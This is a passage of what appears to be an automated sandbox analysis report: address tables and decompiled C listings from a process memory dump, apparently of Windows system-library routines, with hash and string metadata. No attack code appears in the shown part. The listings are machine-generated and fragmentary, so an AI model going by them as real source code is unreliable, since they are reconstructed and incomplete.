                                          0x00e3284e
                                          0x00e32850
                                          0x00e32851
                                          0x00e32854
                                          0x00e32857
                                          0x00e3285a
                                          0x00e3285c
                                          0x00e3285d
                                          0x00000000
                                          0x00000000
                                          0x00e3275d
                                          0x00e32761
                                          0x00000000
                                          0x00e32767
                                          0x00e3276e
                                          0x00e32773
                                          0x00e32773
                                          0x00e32776
                                          0x00e32778
                                          0x00e3277e
                                          0x00e3277e
                                          0x00e32781
                                          0x00e32781
                                          0x00e32783
                                          0x00e32784
                                          0x00000000
                                          0x00000000
                                          0x00e75bd8
                                          0x00e75bde
                                          0x00e75be4
                                          0x00e75be6
                                          0x00e75be8
                                          0x00e75be9
                                          0x00e75bee
                                          0x00e75bf8
                                          0x00e75bff
                                          0x00e75c01
                                          0x00e75c04
                                          0x00e75c07
                                          0x00e75c0b
                                          0x00e75c0d
                                          0x00e75c0d
                                          0x00e75c15
                                          0x00e75c18
                                          0x00e75c1b
                                          0x00e75c1b
                                          0x00e75c1e
                                          0x00000000
                                          0x00000000
                                          0x00e328c3
                                          0x00e328c8
                                          0x00e328d2
                                          0x00e328d4
                                          0x00e328d8
                                          0x00e328db
                                          0x00e75c26
                                          0x00e75c28
                                          0x00e75c2d
                                          0x00e75c2d
                                          0x00000000
                                          0x00000000
                                          0x00e75c34
                                          0x00e75c36
                                          0x00e75c49
                                          0x00e75c4e
                                          0x00e75c54
                                          0x00e75c5b
                                          0x00e75c5d
                                          0x00e75c60
                                          0x00e32788
                                          0x00e32788
                                          0x00e3278b
                                          0x00e3278e
                                          0x00e3278e
                                          0x00e3278e
                                          0x00e32791
                                          0x00000000
                                          0x00000000
                                          0x00e32756
                                          0x00e32750
                                          0x00000000
                                          0x00e32794
                                          0x00e32794
                                          0x00e32795
                                          0x00e32798
                                          0x00e32798
                                          0x00000000
                                          0x00e32734
                                          0x00e3272c
                                          0x00e32700
                                          0x00e325ef
                                          0x00e325ef
                                          0x00e325ef
                                          0x00e325f2
                                          0x00e325f8
                                          0x00000000
                                          0x00000000
                                          0x00e325fe
                                          0x00000000
                                          0x00e328e6
                                          0x00e328ec
                                          0x00e328ef
                                          0x00e328f5
                                          0x00e328f8
                                          0x00e328f8
                                          0x00000000
                                          0x00e328f8
                                          0x00000000
                                          0x00000000
                                          0x00e32866
                                          0x00e32866
                                          0x00e32876
                                          0x00e32879
                                          0x00000000
                                          0x00000000
                                          0x00e327e0
                                          0x00e327e7
                                          0x00e327e9
                                          0x00e327eb
                                          0x00e75afd
                                          0x00000000
                                          0x00e75afd
                                          0x00000000
                                          0x00000000
                                          0x00e32633
                                          0x00e32638
                                          0x00e3263b
                                          0x00e3263c
                                          0x00e3263e
                                          0x00e32640
                                          0x00e32642
                                          0x00e32647
                                          0x00e32649
                                          0x00e3264e
                                          0x00e32650
                                          0x00e32653
                                          0x00e32659
                                          0x00e326a2
                                          0x00e326a7
                                          0x00e326ac
                                          0x00e326b2
                                          0x00e75b11
                                          0x00e75b15
                                          0x00e75b17
                                          0x00000000
                                          0x00e326b8
                                          0x00e326b8
                                          0x00e326ba
                                          0x00e327a6
                                          0x00e327a6
                                          0x00e327a9
                                          0x00e327ab
                                          0x00e327b9
                                          0x00e327b9
                                          0x00e327be
                                          0x00e327c1
                                          0x00e327c3
                                          0x00e327c5
                                          0x00e327c7
                                          0x00e75c74
                                          0x00e75c79
                                          0x00e75c79
                                          0x00e327c7
                                          0x00000000
                                          0x00e326c0
                                          0x00e326c0
                                          0x00e326c3
                                          0x00e326c6
                                          0x00e326c6
                                          0x00e326c9
                                          0x00e326c9
                                          0x00000000
                                          0x00e326c9
                                          0x00e326ba
                                          0x00e3265b
                                          0x00e3265b
                                          0x00e3265e
                                          0x00e32667
                                          0x00e3266d
                                          0x00e32677
                                          0x00e3267c
                                          0x00e3267f
                                          0x00e32681
                                          0x00e75b49
                                          0x00e75b4e
                                          0x00e327cd
                                          0x00e327d0
                                          0x00e327d1
                                          0x00e327d2
                                          0x00e327d4
                                          0x00e327dd
                                          0x00e32687
                                          0x00e32687
                                          0x00e3268a
                                          0x00e3268b
                                          0x00e3268e
                                          0x00e3268f
                                          0x00e32691
                                          0x00e32696
                                          0x00e32698
                                          0x00e3269d
                                          0x00e3269f
                                          0x00000000
                                          0x00e3269f
                                          0x00e32681
                                          0x00000000
                                          0x00000000
                                          0x00e32846
                                          0x00000000
                                          0x00000000
                                          0x00e32605
                                          0x00e3260a
                                          0x00e3260c
                                          0x00e32611
                                          0x00e32616
                                          0x00e32619
                                          0x00e32619
                                          0x00e3261e
                                          0x00000000
                                          0x00e32624
                                          0x00e32627
                                          0x00e32627
                                          0x00000000
                                          0x00000000
                                          0x00e75b1f
                                          0x00000000
                                          0x00000000
                                          0x00e32894
                                          0x00e3289b
                                          0x00e3289d
                                          0x00e328a1
                                          0x00e75b2b
                                          0x00e75b2e
                                          0x00e75b2e
                                          0x00e328a7
                                          0x00e328a9
                                          0x00e75b04
                                          0x00e75b09
                                          0x00e75b09
                                          0x00e75b09
                                          0x00000000
                                          0x00000000
                                          0x00e75b35
                                          0x00e75b3c
                                          0x00e328fb
                                          0x00e328fb
                                          0x00e326cc
                                          0x00e326cc
                                          0x00e326d0
                                          0x00000000
                                          0x00e326d2
                                          0x00e326d2
                                          0x00000000
                                          0x00e326d2
                                          0x00000000
                                          0x00000000
                                          0x00e325fe
                                          0x00e3292d
                                          0x00e3292f
                                          0x00e32930
                                          0x00e32935
                                          0x00e32937
                                          0x00e32939
                                          0x00e3293c
                                          0x00e3293e
                                          0x00e3293f
                                          0x00e32941
                                          0x00e32945
                                          0x00e32948
                                          0x00e3294e
                                          0x00e3294f
                                          0x00e32951
                                          0x00e32951
                                          0x00e32954
                                          0x00e3295c
                                          0x00e32962
                                          0x00e32963
                                          0x00e32965
                                          0x00e32966
                                          0x00e32968
                                          0x00e3296b
                                          0x00e3296e
                                          0x00e3296f
                                          0x00e32971
                                          0x00e32974
                                          0x00e3297b
                                          0x00e3297d
                                          0x00e3297e
                                          0x00e3297f
                                          0x00e32980
                                          0x00e32981
                                          0x00e32982
                                          0x00e32983
                                          0x00e32984
                                          0x00e32985
                                          0x00e32986
                                          0x00e32987
                                          0x00e32988
                                          0x00e32989
                                          0x00e3298a
                                          0x00e3298b
                                          0x00e3298c
                                          0x00e3298d
                                          0x00e3298e
                                          0x00e3298f
                                          0x00e32990
                                          0x00e32992
                                          0x00e32997
                                          0x00e329a3
                                          0x00e329a6
                                          0x00e329ab
                                          0x00e329ad
                                          0x00e329b0
                                          0x00e329b2
                                          0x00e75c80
                                          0x00e329b8
                                          0x00e329b8
                                          0x00e329bb
                                          0x00e329c0
                                          0x00e329c5
                                          0x00e329c6
                                          0x00e329c6
                                          0x00e329c9
                                          0x00e329cb
                                          0x00000000
                                          0x00000000
                                          0x00e329cd
                                          0x00e329d0
                                          0x00e329d9
                                          0x00e329db
                                          0x00e329dd
                                          0x00e32a7f
                                          0x00e32a84
                                          0x00e32a87
                                          0x00e32a89
                                          0x00e75ca1
                                          0x00e75ca3
                                          0x00000000
                                          0x00e32a8f
                                          0x00e32a8f
                                          0x00000000
                                          0x00e32a8f
                                          0x00000000
                                          0x00e329e3
                                          0x00e329e3
                                          0x00e329e3
                                          0x00000000
                                          0x00e329e3
                                          0x00e329dd
                                          0x00000000
                                          0x00e329db
                                          0x00e329e6
                                          0x00e329e9
                                          0x00e329eb
                                          0x00e329ed
                                          0x00e329f3
                                          0x00e329f5
                                          0x00e329f8
                                          0x00e329fa
                                          0x00e32a97
                                          0x00e32a9a
                                          0x00e32a9d
                                          0x00e32add
                                          0x00000000
                                          0x00e32a9f
                                          0x00e32aa2
                                          0x00e32aa5
                                          0x00e32aa8
                                          0x00e32aab
                                          0x00e75cab
                                          0x00e75caf
                                          0x00e75cc5
                                          0x00e75cda
                                          0x00e75cdc
                                          0x00e75cdf
                                          0x00e75ce5
                                          0x00000000
                                          0x00e75ceb
                                          0x00e75ced
                                          0x00e75cee
                                          0x00000000
                                          0x00e75cee
                                          0x00e75cb1
                                          0x00e75cb4
                                          0x00e75cb9
                                          0x00e75cbb
                                          0x00000000
                                          0x00e75cbd
                                          0x00e75cbd
                                          0x00000000
                                          0x00e75cbd
                                          0x00e75cbb
                                          0x00e32ab1
                                          0x00e32ab1
                                          0x00e32ac4
                                          0x00e32ac6
                                          0x00e32ac6
                                          0x00000000
                                          0x00e32ac6
                                          0x00e32aab
                                          0x00000000
                                          0x00e32a00
                                          0x00e32a09
                                          0x00e32a0e
                                          0x00e32a21
                                          0x00e32a24
                                          0x00e32a35
                                          0x00e32a3a
                                          0x00e32a3d
                                          0x00e32a42
                                          0x00e32a59
                                          0x00e32a59
                                          0x00e32a5c
                                          0x00e32a5f
                                          0x00e32a5f
                                          0x00e329fa
                                          0x00e329f3
                                          0x00e32a64
                                          0x00e32a64
                                          0x00e32a6b
                                          0x00e32a6b
                                          0x00e32a6d
                                          0x00e32a72
                                          0x00e32a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 8aed54e5c17a9cafc0c8ded06ce61341788a6202e310242280ed3533b0a19713
                                          • Instruction ID: bd92af3797e4527cd9470d82c9d9484d3ce796e6255c602a8a8bd73a29cd80ae
                                          • Opcode Fuzzy Hash: 8aed54e5c17a9cafc0c8ded06ce61341788a6202e310242280ed3533b0a19713
                                          • Instruction Fuzzy Hash: 8DC18D71E002199FCB25DF99D885BFDBBB1FF48704F14502AEA81BB250D774A941CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E00E3FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                          				char _v5;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				char _v16;
                                          				char _v17;
                                          				char _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				char _v32;
                                          				signed int _v40;
                                          				void* __ecx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int _t73;
                                          				intOrPtr* _t75;
                                          				signed int _t77;
                                          				signed int _t79;
                                          				signed int _t81;
                                          				intOrPtr _t83;
                                          				intOrPtr _t85;
                                          				intOrPtr _t86;
                                          				signed int _t91;
                                          				signed int _t94;
                                          				signed int _t95;
                                          				signed int _t96;
                                          				signed int _t106;
                                          				signed int _t108;
                                          				signed int _t114;
                                          				signed int _t116;
                                          				signed int _t118;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				void* _t129;
                                          				signed int _t130;
                                          				void* _t132;
                                          				intOrPtr* _t134;
                                          				signed int _t138;
                                          				signed int _t141;
                                          				signed int _t147;
                                          				intOrPtr _t153;
                                          				signed int _t154;
                                          				signed int _t155;
                                          				signed int _t170;
                                          				void* _t174;
                                          				signed int _t176;
                                          				signed int _t177;
                                          
                                          				_t129 = __ebx;
                                          				_push(_t132);
                                          				_push(__esi);
                                          				_t174 = _t132;
                                          				_t73 =  !( *( *(_t174 + 0x18)));
                                          				if(_t73 >= 0) {
                                          					L5:
                                          					return _t73;
                                          				} else {
                                          					E00E1EEF0(0xef7b60);
                                          					_t134 =  *0xef7b84; // 0x77f07b80
                                          					_t2 = _t174 + 0x24; // 0x24
                                          					_t75 = _t2;
                                          					if( *_t134 != 0xef7b80) {
                                          						_push(3);
                                          						asm("int 0x29");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						_push(0xef7b60);
                                          						_t170 = _v8;
                                          						_v28 = 0;
                                          						_v40 = 0;
                                          						_v24 = 0;
                                          						_v17 = 0;
                                          						_v32 = 0;
                                          						__eflags = _t170 & 0xffff7cf2;
                                          						if((_t170 & 0xffff7cf2) != 0) {
                                          							L43:
                                          							_t77 = 0xc000000d;
                                          						} else {
                                          							_t79 = _t170 & 0x0000000c;
                                          							__eflags = _t79;
                                          							if(_t79 != 0) {
                                          								__eflags = _t79 - 0xc;
                                          								if(_t79 == 0xc) {
                                          									goto L43;
                                          								} else {
                                          									goto L9;
                                          								}
                                          							} else {
                                          								_t170 = _t170 | 0x00000008;
                                          								__eflags = _t170;
                                          								L9:
                                          								_t81 = _t170 & 0x00000300;
                                          								__eflags = _t81 - 0x300;
                                          								if(_t81 == 0x300) {
                                          									goto L43;
                                          								} else {
                                          									_t138 = _t170 & 0x00000001;
                                          									__eflags = _t138;
                                          									_v24 = _t138;
                                          									if(_t138 != 0) {
                                          										__eflags = _t81;
                                          										if(_t81 != 0) {
                                          											goto L43;
                                          										} else {
                                          											goto L11;
                                          										}
                                          									} else {
                                          										L11:
                                          										_push(_t129);
                                          										_t77 = E00E16D90( &_v20);
                                          										_t130 = _t77;
                                          										__eflags = _t130;
                                          										if(_t130 >= 0) {
                                          											_push(_t174);
                                          											__eflags = _t170 & 0x00000301;
                                          											if((_t170 & 0x00000301) == 0) {
                                          												_t176 = _a8;
                                          												__eflags = _t176;
                                          												if(__eflags == 0) {
                                          													L64:
                                          													_t83 =  *[fs:0x18];
                                          													_t177 = 0;
                                          													__eflags =  *(_t83 + 0xfb8);
                                          													if( *(_t83 + 0xfb8) != 0) {
                                          														E00E176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                          														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                          													}
                                          													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                          													goto L15;
                                          												} else {
                                          													asm("sbb edx, edx");
                                          													_t114 = E00EA8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                          													__eflags = _t114;
                                          													if(_t114 < 0) {
                                          														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                          														E00E0B150();
                                          													}
                                          													_t116 = E00EA6D81(_t176,  &_v16);
                                          													__eflags = _t116;
                                          													if(_t116 >= 0) {
                                          														__eflags = _v16 - 2;
                                          														if(_v16 < 2) {
                                          															L56:
                                          															_t118 = E00E175CE(_v20, 5, 0);
                                          															__eflags = _t118;
                                          															if(_t118 < 0) {
                                          																L67:
                                          																_t130 = 0xc0000017;
                                          																goto L32;
                                          															} else {
                                          																__eflags = _v12;
                                          																if(_v12 == 0) {
                                          																	goto L67;
                                          																} else {
                                          																	_t153 =  *0xef8638; // 0x0
                                          																	_t122 = L00E138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                          																	_t154 = _v12;
                                          																	_t130 = _t122;
                                          																	__eflags = _t130;
                                          																	if(_t130 >= 0) {
                                          																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                          																		__eflags = _t123;
                                          																		if(_t123 != 0) {
                                          																			_t155 = _a12;
                                          																			__eflags = _t155;
                                          																			if(_t155 != 0) {
                                          																				 *_t155 = _t123;
                                          																			}
                                          																			goto L64;
                                          																		} else {
                                          																			E00E176E2(_t154);
                                          																			goto L41;
                                          																		}
                                          																	} else {
                                          																		E00E176E2(_t154);
                                          																		_t177 = 0;
                                          																		goto L18;
                                          																	}
                                          																}
                                          															}
                                          														} else {
                                          															__eflags =  *_t176;
                                          															if( *_t176 != 0) {
                                          																goto L56;
                                          															} else {
                                          																__eflags =  *(_t176 + 2);
                                          																if( *(_t176 + 2) == 0) {
                                          																	goto L64;
                                          																} else {
                                          																	goto L56;
                                          																}
                                          															}
                                          														}
                                          													} else {
                                          														_t130 = 0xc000000d;
                                          														goto L32;
                                          													}
                                          												}
                                          												goto L35;
                                          											} else {
                                          												__eflags = _a8;
                                          												if(_a8 != 0) {
                                          													_t77 = 0xc000000d;
                                          												} else {
                                          													_v5 = 1;
                                          													L00E3FCE3(_v20, _t170);
                                          													_t177 = 0;
                                          													__eflags = 0;
                                          													L15:
                                          													_t85 =  *[fs:0x18];
                                          													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                          													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                          														L18:
                                          														__eflags = _t130;
                                          														if(_t130 != 0) {
                                          															goto L32;
                                          														} else {
                                          															__eflags = _v5 - _t130;
                                          															if(_v5 == _t130) {
                                          																goto L32;
                                          															} else {
                                          																_t86 =  *[fs:0x18];
                                          																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                          																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                          																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                          																}
                                          																__eflags = _t177;
                                          																if(_t177 == 0) {
                                          																	L31:
                                          																	__eflags = 0;
                                          																	L00E170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                          																	goto L32;
                                          																} else {
                                          																	__eflags = _v24;
                                          																	_t91 =  *(_t177 + 0x20);
                                          																	if(_v24 != 0) {
                                          																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                          																		goto L31;
                                          																	} else {
                                          																		_t141 = _t91 & 0x00000040;
                                          																		__eflags = _t170 & 0x00000100;
                                          																		if((_t170 & 0x00000100) == 0) {
                                          																			__eflags = _t141;
                                          																			if(_t141 == 0) {
                                          																				L74:
                                          																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                          																				goto L27;
                                          																			} else {
                                          																				_t177 = E00E3FD22(_t177);
                                          																				__eflags = _t177;
                                          																				if(_t177 == 0) {
                                          																					goto L42;
                                          																				} else {
                                          																					_t130 = E00E3FD9B(_t177, 0, 4);
                                          																					__eflags = _t130;
                                          																					if(_t130 != 0) {
                                          																						goto L42;
                                          																					} else {
                                          																						_t68 = _t177 + 0x20;
                                          																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                          																						__eflags =  *_t68;
                                          																						_t91 =  *(_t177 + 0x20);
                                          																						goto L74;
                                          																					}
                                          																				}
                                          																			}
                                          																			goto L35;
                                          																		} else {
                                          																			__eflags = _t141;
                                          																			if(_t141 != 0) {
                                          																				_t177 = E00E3FD22(_t177);
                                          																				__eflags = _t177;
                                          																				if(_t177 == 0) {
                                          																					L42:
                                          																					_t77 = 0xc0000001;
                                          																					goto L33;
                                          																				} else {
                                          																					_t130 = E00E3FD9B(_t177, 0, 4);
                                          																					__eflags = _t130;
                                          																					if(_t130 != 0) {
                                          																						goto L42;
                                          																					} else {
                                          																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                          																						_t91 =  *(_t177 + 0x20);
                                          																						goto L26;
                                          																					}
                                          																				}
                                          																				goto L35;
                                          																			} else {
                                          																				L26:
                                          																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                          																				__eflags = _t94;
                                          																				L27:
                                          																				 *(_t177 + 0x20) = _t94;
                                          																				__eflags = _t170 & 0x00008000;
                                          																				if((_t170 & 0x00008000) != 0) {
                                          																					_t95 = _a12;
                                          																					__eflags = _t95;
                                          																					if(_t95 != 0) {
                                          																						_t96 =  *_t95;
                                          																						__eflags = _t96;
                                          																						if(_t96 != 0) {
                                          																							 *((short*)(_t177 + 0x22)) = 0;
                                          																							_t40 = _t177 + 0x20;
                                          																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                          																							__eflags =  *_t40;
                                          																						}
                                          																					}
                                          																				}
                                          																				goto L31;
                                          																			}
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          														}
                                          													} else {
                                          														_t147 =  *( *[fs:0x18] + 0xfc0);
                                          														_t106 =  *(_t147 + 0x20);
                                          														__eflags = _t106 & 0x00000040;
                                          														if((_t106 & 0x00000040) != 0) {
                                          															_t147 = E00E3FD22(_t147);
                                          															__eflags = _t147;
                                          															if(_t147 == 0) {
                                          																L41:
                                          																_t130 = 0xc0000001;
                                          																L32:
                                          																_t77 = _t130;
                                          																goto L33;
                                          															} else {
                                          																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                          																_t106 =  *(_t147 + 0x20);
                                          																goto L17;
                                          															}
                                          															goto L35;
                                          														} else {
                                          															L17:
                                          															_t108 = _t106 | 0x00000080;
                                          															__eflags = _t108;
                                          															 *(_t147 + 0x20) = _t108;
                                          															 *( *[fs:0x18] + 0xfc0) = _t147;
                                          															goto L18;
                                          														}
                                          													}
                                          												}
                                          											}
                                          											L33:
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L35:
                                          						return _t77;
                                          					} else {
                                          						 *_t75 = 0xef7b80;
                                          						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                          						 *_t134 = _t75;
                                          						 *0xef7b84 = _t75;
                                          						_t73 = E00E1EB70(_t134, 0xef7b60);
                                          						if( *0xef7b20 != 0) {
                                          							_t73 =  *( *[fs:0x30] + 0xc);
                                          							if( *((char*)(_t73 + 0x28)) == 0) {
                                          								_t73 = E00E1FF60( *0xef7b20);
                                          							}
                                          						}
                                          						goto L5;
                                          					}
                                          				}
                                          			}
                                          0x00e3fc03
                                          0x00000000
                                          0x00e3fc09
                                          0x00e3fc09
                                          0x00e3fc0f
                                          0x00e3fc15
                                          0x00e3fc23
                                          0x00e3fc23
                                          0x00e3fc25
                                          0x00e3fc27
                                          0x00e3fc75
                                          0x00e3fc7c
                                          0x00e3fc84
                                          0x00000000
                                          0x00e3fc29
                                          0x00e3fc29
                                          0x00e3fc2d
                                          0x00e3fc30
                                          0x00e7bf0f
                                          0x00000000
                                          0x00e3fc36
                                          0x00e3fc38
                                          0x00e3fc3b
                                          0x00e3fc41
                                          0x00e7bf17
                                          0x00e7bf19
                                          0x00e7bf48
                                          0x00e7bf4b
                                          0x00000000
                                          0x00e7bf1b
                                          0x00e7bf22
                                          0x00e7bf24
                                          0x00e7bf26
                                          0x00000000
                                          0x00e7bf2c
                                          0x00e7bf37
                                          0x00e7bf39
                                          0x00e7bf3b
                                          0x00000000
                                          0x00e7bf41
                                          0x00e7bf41
                                          0x00e7bf41
                                          0x00e7bf41
                                          0x00e7bf45
                                          0x00000000
                                          0x00e7bf45
                                          0x00e7bf3b
                                          0x00e7bf26
                                          0x00000000
                                          0x00e3fc47
                                          0x00e3fc47
                                          0x00e3fc49
                                          0x00e3fcb2
                                          0x00e3fcb4
                                          0x00e3fcb6
                                          0x00e3fcdc
                                          0x00e3fcdc
                                          0x00000000
                                          0x00e3fcb8
                                          0x00e3fcc3
                                          0x00e3fcc5
                                          0x00e3fcc7
                                          0x00000000
                                          0x00e3fcc9
                                          0x00e3fcc9
                                          0x00e3fccd
                                          0x00000000
                                          0x00e3fccd
                                          0x00e3fcc7
                                          0x00000000
                                          0x00e3fc4b
                                          0x00e3fc4b
                                          0x00e3fc4e
                                          0x00e3fc4e
                                          0x00e3fc51
                                          0x00e3fc51
                                          0x00e3fc54
                                          0x00e3fc5a
                                          0x00e3fc5c
                                          0x00e3fc5f
                                          0x00e3fc61
                                          0x00e3fc63
                                          0x00e3fc65
                                          0x00e3fc67
                                          0x00e3fc6e
                                          0x00e3fc72
                                          0x00e3fc72
                                          0x00e3fc72
                                          0x00e3fc72
                                          0x00e3fc67
                                          0x00e3fc61
                                          0x00000000
                                          0x00e3fc5a
                                          0x00e3fc49
                                          0x00e3fc41
                                          0x00e3fc30
                                          0x00e3fc27
                                          0x00e3fc03
                                          0x00e3fbcd
                                          0x00e3fbd3
                                          0x00e3fbd9
                                          0x00e3fbdc
                                          0x00e3fbde
                                          0x00e3fc99
                                          0x00e3fc9b
                                          0x00e3fc9d
                                          0x00e3fcd5
                                          0x00e3fcd5
                                          0x00e3fc89
                                          0x00e3fc89
                                          0x00000000
                                          0x00e3fc9f
                                          0x00e3fc9f
                                          0x00e3fca3
                                          0x00000000
                                          0x00e3fca3
                                          0x00000000
                                          0x00e3fbe4
                                          0x00e3fbe4
                                          0x00e3fbe4
                                          0x00e3fbe4
                                          0x00e3fbe9
                                          0x00e3fbf2
                                          0x00000000
                                          0x00e3fbf2
                                          0x00e3fbde
                                          0x00e3fbcb
                                          0x00e3fbab
                                          0x00e3fc8b
                                          0x00e3fc8b
                                          0x00e3fc8c
                                          0x00e3fb80
                                          0x00e3fb72
                                          0x00e3fb5e
                                          0x00e3fc8d
                                          0x00e3fc91
                                          0x00e3fadf
                                          0x00e3fadf
                                          0x00e3fae1
                                          0x00e3fae4
                                          0x00e3fae7
                                          0x00e3faec
                                          0x00e3faf8
                                          0x00e3fb00
                                          0x00e3fb07
                                          0x00e3fb0f
                                          0x00e3fb0f
                                          0x00e3fb07
                                          0x00000000
                                          0x00e3faf8
                                          0x00e3fadd

                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00E7BE0F
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          • Opcode ID: f5e7a7cd3e67e60f7297739c48b74b1e088a34c4bc008cece6623befd5ca0746
                                          • Instruction ID: 6752854a11928dec1dc46c6ee418f8bd5ce89295b8b36a5117db18c311bed98c
                                          • Opcode Fuzzy Hash: f5e7a7cd3e67e60f7297739c48b74b1e088a34c4bc008cece6623befd5ca0746
                                          • Instruction Fuzzy Hash: 5DA1E171F006098FDB25DB68C858BBABBA5AB48714F14A579E946FB781DB30DC41CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E00E02D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                          				signed char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				signed int _v52;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t55;
                                          				signed int _t57;
                                          				signed int _t58;
                                          				char* _t62;
                                          				signed char* _t63;
                                          				signed char* _t64;
                                          				signed int _t67;
                                          				signed int _t72;
                                          				signed int _t77;
                                          				signed int _t78;
                                          				signed int _t88;
                                          				intOrPtr _t89;
                                          				signed char _t93;
                                          				signed int _t97;
                                          				signed int _t98;
                                          				signed int _t102;
                                          				signed int _t103;
                                          				intOrPtr _t104;
                                          				signed int _t105;
                                          				signed int _t106;
                                          				signed char _t109;
                                          				signed int _t111;
                                          				void* _t116;
                                          
                                          				_t102 = __edi;
                                          				_t97 = __edx;
                                          				_v12 = _v12 & 0x00000000;
                                          				_t55 =  *[fs:0x18];
                                          				_t109 = __ecx;
                                          				_v8 = __edx;
                                          				_t86 = 0;
                                          				_v32 = _t55;
                                          				_v24 = 0;
                                          				_push(__edi);
                                          				if(__ecx == 0xef5350) {
                                          					_t86 = 1;
                                          					_v24 = 1;
                                          					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                          				}
                                          				_t103 = _t102 | 0xffffffff;
                                          				if( *0xef7bc8 != 0) {
                                          					_push(0xc000004b);
                                          					_push(_t103);
                                          					E00E497C0();
                                          				}
                                          				if( *0xef79c4 != 0) {
                                          					_t57 = 0;
                                          				} else {
                                          					_t57 = 0xef79c8;
                                          				}
                                          				_v16 = _t57;
                                          				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                          					_t93 = _t109;
                                          					L23();
                                          				}
                                          				_t58 =  *_t109;
                                          				if(_t58 == _t103) {
                                          					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                          					_t58 = _t103;
                                          					if(__eflags == 0) {
                                          						_t93 = _t109;
                                          						E00E31624(_t86, __eflags);
                                          						_t58 =  *_t109;
                                          					}
                                          				}
                                          				_v20 = _v20 & 0x00000000;
                                          				if(_t58 != _t103) {
                                          					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                          				}
                                          				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                          				_t88 = _v16;
                                          				_v28 = _t104;
                                          				L9:
                                          				while(1) {
                                          					if(E00E27D50() != 0) {
                                          						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                          					} else {
                                          						_t62 = 0x7ffe0382;
                                          					}
                                          					if( *_t62 != 0) {
                                          						_t63 =  *[fs:0x30];
                                          						__eflags = _t63[0x240] & 0x00000002;
                                          						if((_t63[0x240] & 0x00000002) != 0) {
                                          							_t93 = _t109;
                                          							E00E9FE87(_t93);
                                          						}
                                          					}
                                          					if(_t104 != 0xffffffff) {
                                          						_push(_t88);
                                          						_push(0);
                                          						_push(_t104);
                                          						_t64 = E00E49520();
                                          						goto L15;
                                          					} else {
                                          						while(1) {
                                          							_t97 =  &_v8;
                                          							_t64 = E00E3E18B(_t109 + 4, _t97, 4, _t88, 0);
                                          							if(_t64 == 0x102) {
                                          								break;
                                          							}
                                          							_t93 =  *(_t109 + 4);
                                          							_v8 = _t93;
                                          							if((_t93 & 0x00000002) != 0) {
                                          								continue;
                                          							}
                                          							L15:
                                          							if(_t64 == 0x102) {
                                          								break;
                                          							}
                                          							_t89 = _v24;
                                          							if(_t64 < 0) {
                                          								L00E5DF30(_t93, _t97, _t64);
                                          								_push(_t93);
                                          								_t98 = _t97 | 0xffffffff;
                                          								__eflags =  *0xef6901;
                                          								_push(_t109);
                                          								_v52 = _t98;
